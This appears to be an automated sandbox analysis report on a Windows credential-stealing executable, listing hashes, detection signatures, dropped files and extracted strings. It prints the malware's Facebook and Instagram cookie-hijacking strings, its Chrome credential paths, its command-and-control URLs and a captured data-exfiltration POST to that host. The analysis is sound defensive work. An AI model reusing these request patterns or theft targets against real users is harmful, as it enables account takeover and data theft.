Analysis Report aOn5CfTiwS

Overview

General Information

Sample Name: aOn5CfTiwS (renamed file extension from none to exe)
Analysis ID: 346349
MD5: 013eba0050ebe18e39978e89a56c0fab
SHA1: 85ef7c03d70e2cc7095550ce15f140e78d05f3ad
SHA256: 5fa60303a0c4fd13ecd69e7c1a17788b72605473c2fb3f93eb758010326c76e5

Most interesting Screenshot:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Installs new ROOT certificates
Machine Learning detection for sample
PE file has a writeable .text section
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: aOn5CfTiwS.exe Virustotal: Detection: 43% Perma Link
Source: aOn5CfTiwS.exe Metadefender: Detection: 24% Perma Link
Source: aOn5CfTiwS.exe ReversingLabs: Detection: 47%
Machine Learning detection for sample
Source: aOn5CfTiwS.exe Joe Sandbox ML: detected
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack
Uses 32bit PE files
Source: aOn5CfTiwS.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source: Binary string: atl71.pdbT source: atl71.dll.0.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source: Binary string: atl71.pdb source: atl71.dll.0.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Networking:

barindex
Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.244 198.54.117.244
Source: global traffic HTTP traffic detected: GET /info/dd HTTP/1.1Host: 1a469593c1fe15dc.xyzaccept: */*User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: 9https://www.facebook.com/chat/video/videocalldownload.php+ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: bad allocation"encrypted":"name="fb_dtsg" value="accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/?_rdr""logout.phpaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=\"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/logout.phpc_user=deletedbad allocationhttps://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1ocation: equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/accountquality/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: ocation: accept: */*origin: https://www.instagram.comreferer: https://www.instagram.com/sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: cross-siteaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri="access_token":"""access_token":"sessionid="";sessionid=https://www.instagram.com/accounts/login/ajax/facebook/accept: */*origin: https://www.instagram.comreferer: https://www.instagram.com/sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1x-csrftoken: xaccessToken=&fbUserId=;sessionid="username":"https://www.instagram.com/accept: */*sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1"accept: */*sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://www.instagram.com//?__a=1{}graphqluseredge_followed_bycountgraphqluseredge_followed_bycountbad allocationMZ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: origin: https://www.facebook.com equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: seller=^Aguid=^Astatus=^Ainfo/stepbad allocation\Microsoft\Windows\Cookies\Low\*.*.txt\rbc_userxsrb=; c_user=xs=wininet.dllInternetGetCookieEx2InternetFreeCookies=; c_user=xs=https://www.facebook.com/facebook.comc_user=xs=c_user=xs=bad allocationfacebook.com\.txt.exe"%s" /sjson "%s"rbHost NameValueHost NameName=Value; c_user=xs=bad allocation\*.*\\\Google\Chrome\User Data\Chromium\User DataCookiesSystem ProfileCHROMECHROMIUM\Cookies\Login Data\Local StateChromeUserPath.\fb_cookie.cpp[HIJACK][%s][%s][%d]: [INFO] strCookies = %s strBrowser = %s equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: 1a469593c1fe15dc.xyz
Source: unknown HTTP traffic detected: POST /info/step HTTP/1.1Host: 1a469593c1fe15dc.xyzaccept: */*Content-Type:application/x-www-form-urlencodedUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Length: 93Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 5a 64 4d 30 58 42 72 45 4c 4b 67 75 74 77 72 64 4a 74 62 31 69 71 5a 6e 39 6a 6a 58 68 58 56 55 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFZdM0XBrELKgutwrdJtb1iqZn9jjXhXVUA~~
Source: aOn5CfTiwS.exe String found in binary or memory: http://1a469593c1fe15dc.xyz/info/dd
Source: aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/ddpbidden
Source: aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fb
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fb1.6
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fbX
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.211964595.0000000002DF6000.00000004.00000040.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/step
Source: aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepbidden
Source: aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB
Source: aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepstatus=0&L
Source: aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr String found in binary or memory: http://charlesproxy.com/ssl
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: xldl.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://exchangework%04d%02d%02d.xyz/accept:
Source: aOn5CfTiwS.exe, 00000000.00000003.216601589.00000000022A8000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0B
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0E
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0F
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0K
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0M
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0P
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0R
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: xldl.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.0.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.0.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
